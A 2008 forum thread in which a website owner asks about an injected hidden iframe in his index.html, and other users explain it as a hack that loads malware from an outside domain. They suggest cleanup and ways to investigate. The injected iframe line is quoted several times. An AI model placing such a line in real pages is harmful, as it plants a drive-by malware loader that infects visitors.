index issue

Discussion in 'HTML' started by ThL, Apr 22, 2008.

  1. ThL

    ThL Guest

    Hi everyone,
    I recently had some problem accessing the main page of my website : it
    displayed a blank page instead of my usual welcome message.
    I found out that the culprit was the "index.html" file. Here's what its
    code showed :
    <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
    height="0" style="display:none"></iframe><!-- ~ -->

    I created my site four years ago and never altered it since. After such
    a long time I therefore don't remember writing this code, especially the
    "orentraff.cn" bit.

    After many attempts to understand why a blank page appeared I finally
    gave up : I erased the file and replaced it with a new one. It now works
    OK. Yet the problem could arise again at any time.

    1 - Does anyone know what the code mentioned above (in particular
    orentraff.cn) means ?
    2 - Does anyone know what happened to my index file ? Did it get
    corrupted or was my site hacked ?

    Many thanks in advance for your kind replies and help.
    Thierry
    ThL, Apr 22, 2008
    #1
    1. Advertising

  2. ThL

    Steve Pugh Guest

    On Apr 22, 5:52 pm, ThL <Thierry@tlariviereATnordnetDOTfr> wrote:
    > Hi everyone,
    > I recently had some problem accessing the main page of my website : it
    > displayed a blank page instead of my usual welcome message.
    > I found out that the culprit was the "index.html" file. Here's what its
    > code showed :
    > <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
    > height="0" style="display:none"></iframe><!-- ~ -->
    >
    > I created my site four years ago and never altered it since. After such
    > a long time I therefore don't remember writing this code, especially the
    > "orentraff.cn" bit.
    >
    > After many attempts to understand why a blank page appeared I finally
    > gave up : I erased the file and replaced it with a new one. It now works
    > OK. Yet the problem could arise again at any time.
    >
    > 1 - Does anyone know what the code mentioned above (in particular
    > orentraff.cn) means ?


    orentraff.cn is a domain name. The code was calling something from
    another server into an invisible iframe. That something is probably
    malicious.

    > 2 - Does anyone know what happened to my index file ? Did it get
    > corrupted or was my site hacked ?


    You were hacked.

    Steve
    Steve Pugh, Apr 22, 2008
    #2
    1. Advertising

  3. ThL

    ThL Guest

    Steve Pugh a écrit :
    > On Apr 22, 5:52 pm, ThL <Thierry@tlariviereATnordnetDOTfr> wrote:
    >> Hi everyone,
    >> I recently had some problem accessing the main page of my website : it
    >> displayed a blank page instead of my usual welcome message.
    >> I found out that the culprit was the "index.html" file. Here's what its
    >> code showed :
    >> <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
    >> height="0" style="display:none"></iframe><!-- ~ -->
    >>
    >> I created my site four years ago and never altered it since. After such
    >> a long time I therefore don't remember writing this code, especially the
    >> "orentraff.cn" bit.
    >>
    >> After many attempts to understand why a blank page appeared I finally
    >> gave up : I erased the file and replaced it with a new one. It now works
    >> OK. Yet the problem could arise again at any time.
    >>
    >> 1 - Does anyone know what the code mentioned above (in particular
    >> orentraff.cn) means ?

    >
    > orentraff.cn is a domain name. The code was calling something from
    > another server into an invisible iframe. That something is probably
    > malicious.
    >
    >> 2 - Does anyone know what happened to my index file ? Did it get
    >> corrupted or was my site hacked ?

    >
    > You were hacked.
    >
    > Steve


    Oops...
    Thanks for your quick reply Steve.

    Next step :
    Now what ?


    Thierry
    ThL, Apr 22, 2008
    #3
  4. ThL wrote:
    > Steve Pugh a écrit :

    <snip>
    >> You were hacked.


    > Oops...
    > Thanks for your quick reply Steve.
    >
    > Next step :
    > Now what ?


    Remove the line of code.

    Contact hosting company and find out how someone else could have gotten
    write access to your account.

    --
    Take care,

    Jonathan
    -------------------
    LITTLE WORKS STUDIO
    http://www.LittleWorksStudio.com
    Jonathan N. Little, Apr 22, 2008
    #4
  5. ThL

    ThL Guest

    Jonathan N. Little a écrit :
    > ThL wrote:
    >> Steve Pugh a écrit :

    > <snip>
    >>> You were hacked.

    >
    >> Oops...
    >> Thanks for your quick reply Steve.
    >>
    >> Next step :
    >> Now what ?


    Hi Johnathan,
    Thanks for your reply.
    >
    > Remove the line of code.


    I erased the file and replaced it with a new index.html one.
    >
    > Contact hosting company and find out how someone else could have gotten
    > write access to your account.
    >

    I first contacted my ISP, who host my site and asked them what the
    matter was.
    Unfortunately they were unable to give me any further info, apart from
    the fact that the "ghost" site was registered in China.
    I suppose the question of knowing "how someone got my write access" must
    have come to their minds, though they didn't mention it to me.
    Maybe they think I was not careful enough with my private passwords,
    which could be the case. One never knows.
    I'll ask them the question.

    Another question just popped : Are these hacking situations common ? If
    so, what do they use the hacked sites for ? Storing and exchanging
    illegal data ?

    Thierry
    ThL, Apr 22, 2008
    #5
  6. ThL wrote:
    > Hi everyone,
    > I recently had some problem accessing the main page of my website : it
    > displayed a blank page instead of my usual welcome message.
    > I found out that the culprit was the "index.html" file. Here's what its
    > code showed :
    > <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
    > height="0" style="display:none"></iframe><!-- ~ -->
    >
    > I created my site four years ago and never altered it since. After such
    > a long time I therefore don't remember writing this code, especially the
    > "orentraff.cn" bit.
    >
    > After many attempts to understand why a blank page appeared I finally
    > gave up : I erased the file and replaced it with a new one. It now works
    > OK. Yet the problem could arise again at any time.
    >
    > 1 - Does anyone know what the code mentioned above (in particular
    > orentraff.cn) means ?


    It means your page consisted of an invisible iframe of zero width and
    zero height set up to display the page at the address shown. I'm
    guessing, since the page was conspicuously set up not to be seen within
    yours, that it's meant to do nastry things to the computer of anyone who
    visits your page.

    > 2 - Does anyone know what happened to my index file ? Did it get
    > corrupted or was my site hacked ?


    Yes, someone in China hacked into your website.
    Harlan Messinger, Apr 22, 2008
    #6
  7. ThL wrote:
    > Jonathan N. Little a écrit :
    >> ThL wrote:
    >>> Steve Pugh a écrit :

    >> <snip>
    >>>> You were hacked.

    >>
    >>> Oops...
    >>> Thanks for your quick reply Steve.
    >>>
    >>> Next step :
    >>> Now what ?

    >
    > Hi Johnathan,
    > Thanks for your reply.
    >>
    >> Remove the line of code.

    >
    > I erased the file and replaced it with a new index.html one.
    >>
    >> Contact hosting company and find out how someone else could have
    >> gotten write access to your account.
    >>

    > I first contacted my ISP, who host my site and asked them what the
    > matter was.
    > Unfortunately they were unable to give me any further info, apart from
    > the fact that the "ghost" site was registered in China.
    > I suppose the question of knowing "how someone got my write access" must
    > have come to their minds, though they didn't mention it to me.
    > Maybe they think I was not careful enough with my private passwords,
    > which could be the case. One never knows.
    > I'll ask them the question.


    If this a ISP's webspace that came with internet connection account, we
    sometimes the little "Mom & Pop" ISPs are real amateurs with respect to
    hosting. Only time I had a hacked site was with an ISP personal
    webspace. They did not restrict access for their FTP account to users
    home folder (very basic security) and I even told them that once I FTPed
    in I could wander all over the server... This was back in the 90's. Get
    real hosting and this should not be a problem.

    >
    > Another question just popped : Are these hacking situations common ? If
    > so, what do they use the hacked sites for ? Storing and exchanging
    > illegal data ?


    Using your site to plant malware on unsecured browsers and gullible
    visitors.

    If these people who host your site don't know how your site was hacked
    (and you did not tell anyone else your FTP password) I'd find a better
    place to host your site. BTW, if you have not editied your page yet,
    look at the modification date to give you some idea when it was hacked...

    --
    Take care,

    Jonathan
    -------------------
    LITTLE WORKS STUDIO
    http://www.LittleWorksStudio.com
    Jonathan N. Little, Apr 22, 2008
    #7
  8. ThL

    ThL Guest

    Harlan Messinger a écrit :
    > ThL wrote:
    >> Hi everyone,
    >> I recently had some problem accessing the main page of my website : it
    >> displayed a blank page instead of my usual welcome message.
    >> I found out that the culprit was the "index.html" file. Here's what
    >> its code showed :
    >> <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
    >> height="0" style="display:none"></iframe><!-- ~ -->
    >>
    >> I created my site four years ago and never altered it since. After
    >> such a long time I therefore don't remember writing this code,
    >> especially the "orentraff.cn" bit.
    >>
    >> After many attempts to understand why a blank page appeared I finally
    >> gave up : I erased the file and replaced it with a new one. It now
    >> works OK. Yet the problem could arise again at any time.
    >>
    >> 1 - Does anyone know what the code mentioned above (in particular
    >> orentraff.cn) means ?

    >
    > It means your page consisted of an invisible iframe of zero width and
    > zero height set up to display the page at the address shown. I'm
    > guessing, since the page was conspicuously set up not to be seen within
    > yours, that it's meant to do nastry things to the computer of anyone who
    > visits your page.
    >


    Thanks for your reply.

    Would you know how ?

    Thierry

    >> 2 - Does anyone know what happened to my index file ? Did it get
    >> corrupted or was my site hacked ?

    >
    > Yes, someone in China hacked into your website.
    ThL, Apr 23, 2008
    #8
  9. ThL wrote:
    > Harlan Messinger a écrit :
    >> ThL wrote:
    >>> Hi everyone,
    >>> I recently had some problem accessing the main page of my website :
    >>> it displayed a blank page instead of my usual welcome message.

    [snip]
    >> It means your page consisted of an invisible iframe of zero width and
    >> zero height set up to display the page at the address shown. I'm
    >> guessing, since the page was conspicuously set up not to be seen
    >> within yours, that it's meant to do nastry things to the computer of
    >> anyone who visits your page.

    >
    > Thanks for your reply.
    >
    > Would you know how ?


    No. But clearly you have a security leak somewhere.
    Harlan Messinger, Apr 23, 2008
    #9
  10. Harlan Messinger wrote:
    > ThL wrote:
    >> Harlan Messinger a écrit :
    >>> ThL wrote:
    >>>> Hi everyone,
    >>>> I recently had some problem accessing the main page of my website :
    >>>> it displayed a blank page instead of my usual welcome message.

    > [snip]
    >>> It means your page consisted of an invisible iframe of zero width and
    >>> zero height set up to display the page at the address shown. I'm
    >>> guessing, since the page was conspicuously set up not to be seen
    >>> within yours, that it's meant to do nastry things to the computer of
    >>> anyone who visits your page.

    >>
    >> Thanks for your reply.
    >>
    >> Would you know how ?

    >
    > No. But clearly you have a security leak somewhere.


    As I said elsewhere in the thread, before to fix the page check the
    modification date, that can help you determine when the hack occurred.
    If it was not too long ago your ISP should have the FTP session logged.
    I would start there...

    --
    Take care,

    Jonathan
    -------------------
    LITTLE WORKS STUDIO
    http://www.LittleWorksStudio.com
    Jonathan N. Little, Apr 23, 2008
    #10
  11. ThL

    ThL Guest

    Jonathan N. Little a écrit :
    > Harlan Messinger wrote:
    >> ThL wrote:
    >>> Harlan Messinger a écrit :
    >>>> ThL wrote:
    >>>>> Hi everyone,
    >>>>> I recently had some problem accessing the main page of my website :
    >>>>> it displayed a blank page instead of my usual welcome message.

    >> [snip]
    >>>> It means your page consisted of an invisible iframe of zero width
    >>>> and zero height set up to display the page at the address shown. I'm
    >>>> guessing, since the page was conspicuously set up not to be seen
    >>>> within yours, that it's meant to do nastry things to the computer of
    >>>> anyone who visits your page.
    >>>
    >>> Thanks for your reply.
    >>>
    >>> Would you know how ?

    >>
    >> No. But clearly you have a security leak somewhere.

    >
    > As I said elsewhere in the thread, before to fix the page check the
    > modification date, that can help you determine when the hack occurred.
    > If it was not too long ago your ISP should have the FTP session logged.
    > I would start there...
    >

    OK then I'll contact them and ask the question.

    All this is very worrying.

    Thanks a lot for your help, Johnathan, Harlan and Steve !

    Thierry
    ThL, Apr 23, 2008
    #11
  12. ThL

    T Lariviere Guest

    Jonathan N. Little a écrit :
    > ThL wrote:
    >> Jonathan N. Little a écrit :
    >>> ThL wrote:
    >>>> Steve Pugh a écrit :
    >>> <snip>
    >>>>> You were hacked.
    >>>
    >>>> Oops...
    >>>> Thanks for your quick reply Steve.
    >>>>
    >>>> Next step :
    >>>> Now what ?

    >>
    >> Hi Johnathan,
    >> Thanks for your reply.
    >>>
    >>> Remove the line of code.

    >>
    >> I erased the file and replaced it with a new index.html one.
    >>>
    >>> Contact hosting company and find out how someone else could have
    >>> gotten write access to your account.
    >>>

    >> I first contacted my ISP, who host my site and asked them what the
    >> matter was.
    >> Unfortunately they were unable to give me any further info, apart from
    >> the fact that the "ghost" site was registered in China.
    >> I suppose the question of knowing "how someone got my write access"
    >> must have come to their minds, though they didn't mention it to me.
    >> Maybe they think I was not careful enough with my private passwords,
    >> which could be the case. One never knows.
    >> I'll ask them the question.

    >
    > If this a ISP's webspace that came with internet connection account, we
    > sometimes the little "Mom & Pop" ISPs are real amateurs with respect to
    > hosting. Only time I had a hacked site was with an ISP personal
    > webspace. They did not restrict access for their FTP account to users
    > home folder (very basic security) and I even told them that once I FTPed
    > in I could wander all over the server... This was back in the 90's. Get
    > real hosting and this should not be a problem.
    >
    >>
    >> Another question just popped : Are these hacking situations common ?
    >> If so, what do they use the hacked sites for ? Storing and exchanging
    >> illegal data ?

    >
    > Using your site to plant malware on unsecured browsers and gullible
    > visitors.
    >
    > If these people who host your site don't know how your site was hacked
    > (and you did not tell anyone else your FTP password) I'd find a better
    > place to host your site. BTW, if you have not editied your page yet,
    > look at the modification date to give you some idea when it was hacked...
    >

    Good to know.
    Thanks.
    Thierry
    T Lariviere, Apr 25, 2008
    #12
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. karthikeyavenkat
    Replies:
    2
    Views:
    567
    Bryce
    Mar 17, 2005
  2. Shawn W_
    Replies:
    5
    Views:
    264
    Aldric Giacomoni
    Sep 16, 2009
  3. ngoc
    Replies:
    5
    Views:
    167
    Tad McClellan
    May 11, 2006
  4. Tomasz Chmielewski

    sorting index-15, index-9, index-110 "the human way"?

    Tomasz Chmielewski, Mar 4, 2008, in forum: Perl Misc
    Replies:
    4
    Views:
    269
    Tomasz Chmielewski
    Mar 4, 2008
  5. Stefan Mueller
    Replies:
    7
    Views:
    176
    Thomas 'PointedEars' Lahn
    Nov 28, 2005
Loading...

Share This Page